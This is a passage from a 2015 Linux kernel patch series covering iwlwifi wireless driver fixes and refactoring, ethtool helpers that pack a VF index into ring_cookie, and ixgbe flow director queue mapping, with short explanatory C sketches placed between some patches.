@@ -320,7 +320,7 @@ struct iwl_trans_pcie { /*protect hw register */ spinlock_t reg_lock; - bool cmd_in_flight; + bool cmd_hold_nic_awake; bool ref_cmd_in_flight; /* protect ref counter */ diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index d6f6515fe663..dc179094e6a0 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -1372,7 +1372,7 @@ static bool iwl_trans_pcie_grab_nic_access(struct iwl_trans *trans, bool silent, spin_lock_irqsave(&trans_pcie->reg_lock, *flags); - if (trans_pcie->cmd_in_flight) + if (trans_pcie->cmd_hold_nic_awake) goto out; /* this bit wakes up the NIC */ @@ -1438,7 +1438,7 @@ static void iwl_trans_pcie_release_nic_access(struct iwl_trans *trans, */ __acquire(&trans_pcie->reg_lock); - if (trans_pcie->cmd_in_flight) + if (trans_pcie->cmd_hold_nic_awake) goto out; __iwl_trans_pcie_clear_bit(trans, CSR_GP_CNTRL, diff --git a/drivers/net/wireless/iwlwifi/pcie/tx.c b/drivers/net/wireless/iwlwifi/pcie/tx.c index 06952aadfd7b..5ef8044c2ea3 100644 --- a/drivers/net/wireless/iwlwifi/pcie/tx.c +++ b/drivers/net/wireless/iwlwifi/pcie/tx.c @@ -1039,18 +1039,14 @@ static int iwl_pcie_set_cmd_in_flight(struct iwl_trans *trans, iwl_trans_pcie_ref(trans); } - if (trans_pcie->cmd_in_flight) - return 0; - - trans_pcie->cmd_in_flight = true; - /* * wake up the NIC to make sure that the firmware will see the host * command - we will let the NIC sleep once all the host commands * returned. This needs to be done only on NICs that have * apmg_wake_up_wa set. */ - if (trans->cfg->base_params->apmg_wake_up_wa) { + if (trans->cfg->base_params->apmg_wake_up_wa && + !trans_pcie->cmd_hold_nic_awake) { __iwl_trans_pcie_set_bit(trans, CSR_GP_CNTRL, CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); if (trans->cfg->device_family == IWL_DEVICE_FAMILY_8000) @@ -1064,10 +1060,10 @@ static int iwl_pcie_set_cmd_in_flight(struct iwl_trans *trans, if (ret < 0) { __iwl_trans_pcie_clear_bit(trans, CSR_GP_CNTRL, CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); - trans_pcie->cmd_in_flight = false; IWL_ERR(trans, "Failed to wake NIC for hcmd\n"); return -EIO; } + trans_pcie->cmd_hold_nic_awake = true; } return 0; @@ -1085,15 +1081,14 @@ static int iwl_pcie_clear_cmd_in_flight(struct iwl_trans *trans) iwl_trans_pcie_unref(trans); } - if (WARN_ON(!trans_pcie->cmd_in_flight)) - return 0; - - trans_pcie->cmd_in_flight = false; + if (trans->cfg->base_params->apmg_wake_up_wa) { + if (WARN_ON(!trans_pcie->cmd_hold_nic_awake)) + return 0; - if (trans->cfg->base_params->apmg_wake_up_wa) + trans_pcie->cmd_hold_nic_awake = false; __iwl_trans_pcie_clear_bit(trans, CSR_GP_CNTRL, - CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); - + CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); + } return 0; } From f115fdfd61bd627e99d636bb61a3d3ff93397048 Mon Sep 17 00:00:00 2001 From: Liad Kaufman Date: Tue, 19 May 2015 14:20:25 +0300 Subject: [PATCH 358/872] iwlwifi: nvm: fix otp parsing in 8000 hw family The radio cfg DWORD was taken from the wrong place in the 8000 HW family, after a line in the code was wrongly changed by mistake. This broke several 8260 devices. 
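To make the cmd_hold_nic_awake bookkeeping from the pcie patch above easier to follow, here is a simplified, self-contained sketch. The structure, field and function names are illustrative stand-ins, not the driver's; the point is that the flag is only ever touched on hardware needing the workaround, and only set once the wake actually succeeded.

#include <stdbool.h>

struct trans_state {
	bool needs_wake_workaround;	/* mirrors apmg_wake_up_wa */
	bool cmd_hold_nic_awake;	/* set only once the NIC is really awake */
};

/* Stub standing in for the register poll that confirms the NIC woke up. */
static int poll_nic_awake(void)
{
	return 0;
}

static int set_cmd_in_flight(struct trans_state *t)
{
	if (t->needs_wake_workaround && !t->cmd_hold_nic_awake) {
		if (poll_nic_awake() < 0)
			return -1;	/* leave the flag untouched on failure */
		t->cmd_hold_nic_awake = true;
	}
	return 0;
}

static void clear_cmd_in_flight(struct trans_state *t)
{
	if (t->needs_wake_workaround && t->cmd_hold_nic_awake)
		t->cmd_hold_nic_awake = false;	/* release the NIC here */
}

int main(void)
{
	struct trans_state t = { .needs_wake_workaround = true };

	if (set_cmd_in_flight(&t))
		return 1;
	clear_cmd_in_flight(&t);
	return 0;
}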
Fixes: 5dd9c68a854a ("iwlwifi: drop support for early versions of 8000") Signed-off-by: Liad Kaufman Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-nvm-parse.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c index 75e96db6626b..8e604a3931ca 100644 --- a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c +++ b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c @@ -471,7 +471,7 @@ static int iwl_get_radio_cfg(const struct iwl_cfg *cfg, const __le16 *nvm_sw, if (cfg->device_family != IWL_DEVICE_FAMILY_8000) return le16_to_cpup(nvm_sw + RADIO_CFG); - return le32_to_cpup((__le32 *)(nvm_sw + RADIO_CFG_FAMILY_8000)); + return le32_to_cpup((__le32 *)(phy_sku + RADIO_CFG_FAMILY_8000)); } From 8cf6f497de405ca9eb87ffb34d90699962d10125 Mon Sep 17 00:00:00 2001 From: John Fastabend Date: Tue, 26 May 2015 08:22:49 -0700 Subject: [PATCH 359/872] ethtool: Add helper routines to pass vf to rx_flow_spec The ring_cookie is 64 bits wide which is much larger than can be used for actual queue index values. So provide some helper routines to pack a VF index into the cookie. This is useful to steer packets to a VF ring without having to know the queue layout of the device. CC: Alex Duyck Signed-off-by: John Fastabend Signed-off-by: Jeff Kirsher --- include/uapi/linux/ethtool.h | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/include/uapi/linux/ethtool.h b/include/uapi/linux/ethtool.h index ae832b45b44c..0594933cdf55 100644 --- a/include/uapi/linux/ethtool.h +++ b/include/uapi/linux/ethtool.h @@ -796,6 +796,31 @@ struct ethtool_rx_flow_spec { __u32 location; }; +/* How rings are layed out when accessing virtual functions or + * offloaded queues is device specific. To allow users to do flow + * steering and specify these queues the ring cookie is partitioned + * into a 32bit queue index with an 8 bit virtual function id. + * This also leaves the 3bytes for further specifiers. It is possible + * future devices may support more than 256 virtual functions if + * devices start supporting PCIe w/ARI. However at the moment I + * do not know of any devices that support this so I do not reserve + * space for this at this time. If a future patch consumes the next + * byte it should be aware of this possiblity. + */ +#define ETHTOOL_RX_FLOW_SPEC_RING 0x00000000FFFFFFFFLL +#define ETHTOOL_RX_FLOW_SPEC_RING_VF 0x000000FF00000000LL +#define ETHTOOL_RX_FLOW_SPEC_RING_VF_OFF 32 +static inline __u64 ethtool_get_flow_spec_ring(__u64 ring_cookie) +{ + return ETHTOOL_RX_FLOW_SPEC_RING & ring_cookie; +}; + +static inline __u64 ethtool_get_flow_spec_ring_vf(__u64 ring_cookie) +{ + return (ETHTOOL_RX_FLOW_SPEC_RING_VF & ring_cookie) >> + ETHTOOL_RX_FLOW_SPEC_RING_VF_OFF; +}; + /** * struct ethtool_rxnfc - command to get or set RX flow classification rules * @cmd: Specific command number - %ETHTOOL_GRXFH, %ETHTOOL_SRXFH, From b8c474d9c51443ed67336ac89450de44dccee6c0 Mon Sep 17 00:00:00 2001 From: Nicholas Krause Date: Sat, 23 May 2015 20:53:21 -0400 Subject: [PATCH 360/872] iwlwifi: Remove use of the deprecacted PTR_RET This removes the use of the two deprecated calls to the macro PTR_RET in iwl_mvm_get_regdomain and replaces them both to PTR_ERR_OR_ZERO. 
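The ethtool change above only adds the decode helpers; the encode direction is the mirror image. A hedged userspace sketch, with the macro and function names renamed so they do not collide with the real uapi header (make_ring_cookie is not part of the kernel API):

#include <stdint.h>
#include <stdio.h>

#define RX_FLOW_SPEC_RING	0x00000000FFFFFFFFULL
#define RX_FLOW_SPEC_RING_VF	0x000000FF00000000ULL
#define RX_FLOW_SPEC_RING_VF_OFF 32

/* Pack a VF field and a queue index into one 64-bit ring_cookie. */
static uint64_t make_ring_cookie(uint8_t vf, uint32_t ring)
{
	return ((uint64_t)vf << RX_FLOW_SPEC_RING_VF_OFF) |
	       ((uint64_t)ring & RX_FLOW_SPEC_RING);
}

int main(void)
{
	uint64_t cookie = make_ring_cookie(3, 7);

	printf("ring=%llu vf=%llu\n",
	       (unsigned long long)(cookie & RX_FLOW_SPEC_RING),
	       (unsigned long long)((cookie & RX_FLOW_SPEC_RING_VF) >>
				    RX_FLOW_SPEC_RING_VF_OFF));
	return 0;
}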
Signed-off-by: Nicholas Krause [Commit message editing] Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index ccbe5757dd26..677143c79fa6 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -318,7 +318,7 @@ struct ieee80211_regdomain *iwl_mvm_get_regdomain(struct wiphy *wiphy, resp = iwl_mvm_update_mcc(mvm, alpha2, src_id); if (IS_ERR_OR_NULL(resp)) { IWL_DEBUG_LAR(mvm, "Could not get update from FW %d\n", - PTR_RET(resp)); + PTR_ERR_OR_ZERO(resp)); goto out; } @@ -334,7 +334,7 @@ struct ieee80211_regdomain *iwl_mvm_get_regdomain(struct wiphy *wiphy, kfree(resp); if (IS_ERR_OR_NULL(regd)) { IWL_DEBUG_LAR(mvm, "Could not get parse update from FW %d\n", - PTR_RET(regd)); + PTR_ERR_OR_ZERO(regd)); goto out; } From a54cb6411b96379e107c364f2f0883c47628d046 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Mon, 25 May 2015 09:36:53 +0300 Subject: [PATCH 361/872] iwlwifi: mvm: small fix in a comment about UMAC scan schedules The UMAC API supports multiple scan schedules, but now we use only a single one. Change the comment to make this clear and avoid confusion. Signed-off-by: Luciano Coelho Reviewed-by: David Spinadel Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index e50fd3fd8ab0..e54432aad2e5 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1222,8 +1222,8 @@ static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, iwl_mvm_umac_scan_cfg_channels(mvm, params->channels, params->n_channels, ssid_bitmap, cmd); - /* With UMAC we can have only one schedule, so use the sum of - * the iterations (with a a maximum of 255). + /* With UMAC we use only one schedule for now, so use the sum + * of the iterations (with a a maximum of 255). */ sec_part->schedule[0].iter_count = (n_iterations > 255) ? 255 : n_iterations; From 7b501d10b18bc34cc486201027fd6fc35779fb0e Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Fri, 22 May 2015 11:28:58 +0200 Subject: [PATCH 362/872] iwlwifi: refactor common transport alloc/init code The transport modules all need to allocate memory and set up certain values. Refactor that code into a new common function to share it and to simplify the error handling. 
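The refactor above centralises the "allocate the transport plus its bus-private area, fill the common fields, set up shared resources, undo everything on failure" sequence. A generic userspace sketch of that allocation pattern, with invented names and none of the iwlwifi specifics:

#include <stdlib.h>

struct transport {
	const char *name;
	/* ... fields shared by all bus back-ends ... */
	char priv[];		/* bus-specific state lives right behind */
};

static struct transport *transport_alloc(size_t priv_size, const char *name)
{
	struct transport *t = calloc(1, sizeof(*t) + priv_size);

	if (!t)
		return NULL;
	t->name = name;
	/* further shared setup goes here; on failure free(t) and return
	 * NULL so every caller has a single, simple error path */
	return t;
}

static void transport_free(struct transport *t)
{
	free(t);
}

int main(void)
{
	struct transport *t = transport_alloc(64, "pcie");

	if (!t)
		return 1;
	transport_free(t);
	return 0;
}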
Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/Makefile | 1 + drivers/net/wireless/iwlwifi/iwl-trans.c | 113 ++++++++++++++++++++++ drivers/net/wireless/iwlwifi/iwl-trans.h | 20 ++-- drivers/net/wireless/iwlwifi/pcie/trans.c | 40 ++------ 4 files changed, 131 insertions(+), 43 deletions(-) create mode 100644 drivers/net/wireless/iwlwifi/iwl-trans.c diff --git a/drivers/net/wireless/iwlwifi/Makefile b/drivers/net/wireless/iwlwifi/Makefile index 3d32f4120174..dbfc5b18bcb7 100644 --- a/drivers/net/wireless/iwlwifi/Makefile +++ b/drivers/net/wireless/iwlwifi/Makefile @@ -9,6 +9,7 @@ iwlwifi-objs += iwl-phy-db.o iwl-nvm-parse.o iwlwifi-objs += pcie/drv.o pcie/rx.o pcie/tx.o pcie/trans.o iwlwifi-$(CONFIG_IWLDVM) += iwl-1000.o iwl-2000.o iwl-5000.o iwl-6000.o iwlwifi-$(CONFIG_IWLMVM) += iwl-7000.o iwl-8000.o +iwlwifi-objs += iwl-trans.o iwlwifi-objs += $(iwlwifi-m) diff --git a/drivers/net/wireless/iwlwifi/iwl-trans.c b/drivers/net/wireless/iwlwifi/iwl-trans.c new file mode 100644 index 000000000000..9f8bcefc04c5 --- /dev/null +++ b/drivers/net/wireless/iwlwifi/iwl-trans.c @@ -0,0 +1,113 @@ +/****************************************************************************** + * + * This file is provided under a dual BSD/GPLv2 license. When using or + * redistributing this file, you may do so under either license. + * + * GPL LICENSE SUMMARY + * + * Copyright(c) 2015 Intel Mobile Communications GmbH + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of version 2 of the GNU General Public License as + * published by the Free Software Foundation. + * + * This program is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110, + * USA + * + * The full GNU General Public License is included in this distribution + * in the file called COPYING. + * + * Contact Information: + * Intel Linux Wireless + * Intel Corporation, 5200 N.E. Elam Young Parkway, Hillsboro, OR 97124-6497 + * + * BSD LICENSE + * + * Copyright(c) 2015 Intel Mobile Communications GmbH + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * + * * Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * * Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in + * the documentation and/or other materials provided with the + * distribution. + * * Neither the name Intel Corporation nor the names of its + * contributors may be used to endorse or promote products derived + * from this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS + * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT + * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR + * A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT + * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT + * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, + * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY + * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT + * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + * + *****************************************************************************/ +#include +#include "iwl-trans.h" + +struct iwl_trans *iwl_trans_alloc(unsigned int priv_size, + struct device *dev, + const struct iwl_cfg *cfg, + const struct iwl_trans_ops *ops, + size_t dev_cmd_headroom) +{ + struct iwl_trans *trans; +#ifdef CONFIG_LOCKDEP + static struct lock_class_key __key; +#endif + + trans = kzalloc(sizeof(*trans) + priv_size, GFP_KERNEL); + if (!trans) + return NULL; + +#ifdef CONFIG_LOCKDEP + lockdep_init_map(&trans->sync_cmd_lockdep_map, "sync_cmd_lockdep_map", + &__key, 0); +#endif + + trans->dev = dev; + trans->cfg = cfg; + trans->ops = ops; + trans->dev_cmd_headroom = dev_cmd_headroom; + + snprintf(trans->dev_cmd_pool_name, sizeof(trans->dev_cmd_pool_name), + "iwl_cmd_pool:%s", dev_name(trans->dev)); + trans->dev_cmd_pool = + kmem_cache_create(trans->dev_cmd_pool_name, + sizeof(struct iwl_device_cmd) + + trans->dev_cmd_headroom, + sizeof(void *), + SLAB_HWCACHE_ALIGN, + NULL); + if (!trans->dev_cmd_pool) + goto free; + + return trans; + free: + kfree(trans); + return NULL; +} + +void iwl_trans_free(struct iwl_trans *trans) +{ + kmem_cache_destroy(trans->dev_cmd_pool); + kfree(trans); +} diff --git a/drivers/net/wireless/iwlwifi/iwl-trans.h b/drivers/net/wireless/iwlwifi/iwl-trans.h index 56254a837214..eb34b94faf03 100644 --- a/drivers/net/wireless/iwlwifi/iwl-trans.h +++ b/drivers/net/wireless/iwlwifi/iwl-trans.h @@ -1010,20 +1010,20 @@ static inline void iwl_trans_fw_error(struct iwl_trans *trans) iwl_op_mode_nic_error(trans->op_mode); } +/***************************************************** + * transport helper functions + *****************************************************/ +struct iwl_trans *iwl_trans_alloc(unsigned int priv_size, + struct device *dev, + const struct iwl_cfg *cfg, + const struct iwl_trans_ops *ops, + size_t dev_cmd_headroom); +void iwl_trans_free(struct iwl_trans *trans); + /***************************************************** * driver (transport) register/unregister functions ******************************************************/ int __must_check iwl_pci_register_driver(void); void iwl_pci_unregister_driver(void); -static inline void trans_lockdep_init(struct iwl_trans *trans) -{ -#ifdef CONFIG_LOCKDEP - static struct lock_class_key __key; - - lockdep_init_map(&trans->sync_cmd_lockdep_map, "sync_cmd_lockdep_map", - &__key, 0); -#endif -} - #endif /* __iwl_trans_h__ */ diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index d8943384107e..5c523a7d54f7 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -1366,14 +1366,13 @@ void iwl_trans_pcie_free(struct iwl_trans *trans) iounmap(trans_pcie->hw_base); pci_release_regions(trans_pcie->pci_dev); pci_disable_device(trans_pcie->pci_dev); - kmem_cache_destroy(trans->dev_cmd_pool); if (trans_pcie->napi.poll) netif_napi_del(&trans_pcie->napi); iwl_pcie_free_fw_monitor(trans); 
- kfree(trans); + iwl_trans_free(trans); } static void iwl_trans_pcie_set_pmi(struct iwl_trans *trans, bool state) @@ -2466,18 +2465,13 @@ struct iwl_trans *iwl_trans_pcie_alloc(struct pci_dev *pdev, u16 pci_cmd; int err; - trans = kzalloc(sizeof(struct iwl_trans) + - sizeof(struct iwl_trans_pcie), GFP_KERNEL); - if (!trans) { - err = -ENOMEM; - goto out; - } + trans = iwl_trans_alloc(sizeof(struct iwl_trans_pcie), + &pdev->dev, cfg, &trans_ops_pcie, 0); + if (!trans) + return ERR_PTR(-ENOMEM); trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); - trans->ops = &trans_ops_pcie; - trans->cfg = cfg; - trans_lockdep_init(trans); trans_pcie->trans = trans; spin_lock_init(&trans_pcie->irq_lock); spin_lock_init(&trans_pcie->reg_lock); @@ -2601,25 +2595,8 @@ struct iwl_trans *iwl_trans_pcie_alloc(struct pci_dev *pdev, /* Initialize the wait queue for commands */ init_waitqueue_head(&trans_pcie->wait_command_queue); - snprintf(trans->dev_cmd_pool_name, sizeof(trans->dev_cmd_pool_name), - "iwl_cmd_pool:%s", dev_name(trans->dev)); - - trans->dev_cmd_headroom = 0; - trans->dev_cmd_pool = - kmem_cache_create(trans->dev_cmd_pool_name, - sizeof(struct iwl_device_cmd) - + trans->dev_cmd_headroom, - sizeof(void *), - SLAB_HWCACHE_ALIGN, - NULL); - - if (!trans->dev_cmd_pool) { - err = -ENOMEM; - goto out_pci_disable_msi; - } - if (iwl_pcie_alloc_ict(trans)) - goto out_free_cmd_pool; + goto out_pci_disable_msi; err = request_threaded_irq(pdev->irq, iwl_pcie_isr, iwl_pcie_irq_handler, @@ -2636,8 +2613,6 @@ struct iwl_trans *iwl_trans_pcie_alloc(struct pci_dev *pdev, out_free_ict: iwl_pcie_free_ict(trans); -out_free_cmd_pool: - kmem_cache_destroy(trans->dev_cmd_pool); out_pci_disable_msi: pci_disable_msi(pdev); out_pci_release_regions: @@ -2645,7 +2620,6 @@ struct iwl_trans *iwl_trans_pcie_alloc(struct pci_dev *pdev, out_pci_disable_device: pci_disable_device(pdev); out_no_pci: - kfree(trans); -out: + iwl_trans_free(trans); return ERR_PTR(err); } From 7aac84259656c4f2dd805223659067b1504ed619 Mon Sep 17 00:00:00 2001 From: John Fastabend Date: Tue, 26 May 2015 08:23:33 -0700 Subject: [PATCH 363/872] ixgbe: Allow flow director to use entire queue space Flow director is exported to user space using the ethtool ntuple support. However, currently it only supports steering traffic to a subset of the queues in use by the hardware. This change allows flow director to specify queues that have been assigned to virtual functions by partitioning the ring_cookie into a 8bit VF specifier followed by 32bit queue index. At the moment we don't have any ethernet drivers with more than 2^32 queues on a single function as best I can tell and nor do I expect this to happen anytime soon. This way the ring_cookie's normal use for specifying a queue on a specific PCI function continues to work as expected. 
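The queue-resolution logic the ixgbe change above describes can be condensed as follows. This is an illustrative sketch, not the driver code: the real PF path additionally maps the ring through rx_ring[ring]->reg_idx, and a VF field of 0 means "no VF" while VF n is carried as n + 1 in the cookie.

#include <stdint.h>

#define DROP_QUEUE 127		/* illustrative drop index */

/* Illustrative adapter limits, not the real ixgbe structures. */
struct adapter {
	unsigned int num_rx_queues;
	unsigned int num_vfs;
	unsigned int num_rx_queues_per_pool;
};

/* Return the absolute queue index, or -1 on invalid input. */
static int resolve_queue(const struct adapter *a, uint8_t vf, uint32_t ring,
			 int drop)
{
	if (drop)
		return DROP_QUEUE;
	if (!vf)
		return ring < a->num_rx_queues ? (int)ring : -1;
	if (vf > a->num_vfs || ring >= a->num_rx_queues_per_pool)
		return -1;
	return (int)((vf - 1) * a->num_rx_queues_per_pool + ring);
}

int main(void)
{
	struct adapter a = {
		.num_rx_queues = 16,
		.num_vfs = 4,
		.num_rx_queues_per_pool = 2,
	};

	return resolve_queue(&a, 3, 1, 0) == 5 ? 0 : 1;
}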
CC: Alex Duyck Signed-off-by: John Fastabend Tested-by: Krishneil Singh Signed-off-by: Jeff Kirsher --- .../net/ethernet/intel/ixgbe/ixgbe_ethtool.c | 34 +++++++++++++------ 1 file changed, 24 insertions(+), 10 deletions(-) diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c index 9f6fb19062a0..9a1d0f142b09 100644 --- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c +++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c @@ -2594,18 +2594,35 @@ static int ixgbe_add_ethtool_fdir_entry(struct ixgbe_adapter *adapter, struct ixgbe_hw *hw = &adapter->hw; struct ixgbe_fdir_filter *input; union ixgbe_atr_input mask; + u8 queue; int err; if (!(adapter->flags & IXGBE_FLAG_FDIR_PERFECT_CAPABLE)) return -EOPNOTSUPP; - /* - * Don't allow programming if the action is a queue greater than - * the number of online Rx queues. + /* ring_cookie is a masked into a set of queues and ixgbe pools or + * we use the drop index. */ - if ((fsp->ring_cookie != RX_CLS_FLOW_DISC) && - (fsp->ring_cookie >= adapter->num_rx_queues)) - return -EINVAL; + if (fsp->ring_cookie == RX_CLS_FLOW_DISC) { + queue = IXGBE_FDIR_DROP_QUEUE; + } else { + u32 ring = ethtool_get_flow_spec_ring(fsp->ring_cookie); + u8 vf = ethtool_get_flow_spec_ring_vf(fsp->ring_cookie); + + if (!vf && (ring >= adapter->num_rx_queues)) + return -EINVAL; + else if (vf && + ((vf > adapter->num_vfs) || + ring >= adapter->num_rx_queues_per_pool)) + return -EINVAL; + + /* Map the ring onto the absolute queue index */ + if (!vf) + queue = adapter->rx_ring[ring]->reg_idx; + else + queue = ((vf - 1) * + adapter->num_rx_queues_per_pool) + ring; + } /* Don't allow indexes to exist outside of available space */ if (fsp->location >= ((1024 << adapter->fdir_pballoc) - 2)) { @@ -2683,10 +2700,7 @@ static int ixgbe_add_ethtool_fdir_entry(struct ixgbe_adapter *adapter, /* program filters to filter memory */ err = ixgbe_fdir_write_perfect_filter_82599(hw, - &input->filter, input->sw_idx, - (input->action == IXGBE_FDIR_DROP_QUEUE) ? - IXGBE_FDIR_DROP_QUEUE : - adapter->rx_ring[input->action]->reg_idx); + &input->filter, input->sw_idx, queue); if (err) goto err_out_w_lock; From 1899e114822273636fb96c76a9567cf9cfc1dba6 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Tue, 26 May 2015 11:59:53 +0300 Subject: [PATCH 364/872] iwlwifi: bump API to 14 The iwlmvm driver is now able to handle -14.ucode. 
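The bump above only widens the range of ucode API versions the driver accepts. As a rough illustration (this is not the actual iwlwifi request logic, and the file-name format and minimum value below are assumptions), a driver using such MAX/MIN bounds typically probes candidate firmware files from the newest API downwards:

#include <stdio.h>

#define UCODE_API_MAX 14
#define UCODE_API_MIN 12	/* assumed lower bound, for illustration only */

int main(void)
{
	char name[64];
	int api;

	/* Try the newest supported API first, fall back towards the minimum. */
	for (api = UCODE_API_MAX; api >= UCODE_API_MIN; api--) {
		snprintf(name, sizeof(name), "iwlwifi-XXXX-%d.ucode", api);
		printf("would request: %s\n", name);
	}
	return 0;
}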
Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-7000.c | 2 +- drivers/net/wireless/iwlwifi/iwl-8000.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-7000.c b/drivers/net/wireless/iwlwifi/iwl-7000.c index 0afe4946e4f9..b40b385ee0df 100644 --- a/drivers/net/wireless/iwlwifi/iwl-7000.c +++ b/drivers/net/wireless/iwlwifi/iwl-7000.c @@ -69,7 +69,7 @@ #include "iwl-agn-hw.h" /* Highest firmware API version supported */ -#define IWL7260_UCODE_API_MAX 13 +#define IWL7260_UCODE_API_MAX 14 /* Oldest version we won't warn about */ #define IWL7260_UCODE_API_OK 12 diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index ce6321b7d241..f9770b7922fc 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -69,7 +69,7 @@ #include "iwl-agn-hw.h" /* Highest firmware API version supported */ -#define IWL8000_UCODE_API_MAX 13 +#define IWL8000_UCODE_API_MAX 14 /* Oldest version we won't warn about */ #define IWL8000_UCODE_API_OK 12 From 47dbab263db205f6bbc6bd10ba45cfb4ad75ec2f Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Tue, 28 Apr 2015 21:32:47 +0300 Subject: [PATCH 365/872] iwlwifi: pcie: simplify return value This was spot by Coccinelle. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/trans.c | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index 5c523a7d54f7..a341ed90f8a8 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -973,12 +973,8 @@ static int iwl_pcie_load_given_ucode_8000(struct iwl_trans *trans, return ret; /* load to FW the binary sections of CPU2 */ - ret = iwl_pcie_load_cpu_sections_8000(trans, image, 2, - &first_ucode_section); - if (ret) - return ret; - - return 0; + return iwl_pcie_load_cpu_sections_8000(trans, image, 2, + &first_ucode_section); } static int iwl_trans_pcie_start_fw(struct iwl_trans *trans, From 25870cb75096cbfa7079b200e71e359cf21a9a82 Mon Sep 17 00:00:00 2001 From: Matti Gottlieb Date: Mon, 4 May 2015 09:34:37 +0300 Subject: [PATCH 366/872] iwlwifi: mvm: Add debugfs entry for Tx power limit Add debugfs entry for showing the different Tx power restrictions that are caused due to various reasons. Signed-off-by: Matti Gottlieb Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/mvm/debugfs-vif.c | 21 +++++++++++++++++-- 1 file changed, 19 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/debugfs-vif.c b/drivers/net/wireless/iwlwifi/mvm/debugfs-vif.c index 5f37eab5008d..5c8a65de0e77 100644 --- a/drivers/net/wireless/iwlwifi/mvm/debugfs-vif.c +++ b/drivers/net/wireless/iwlwifi/mvm/debugfs-vif.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel 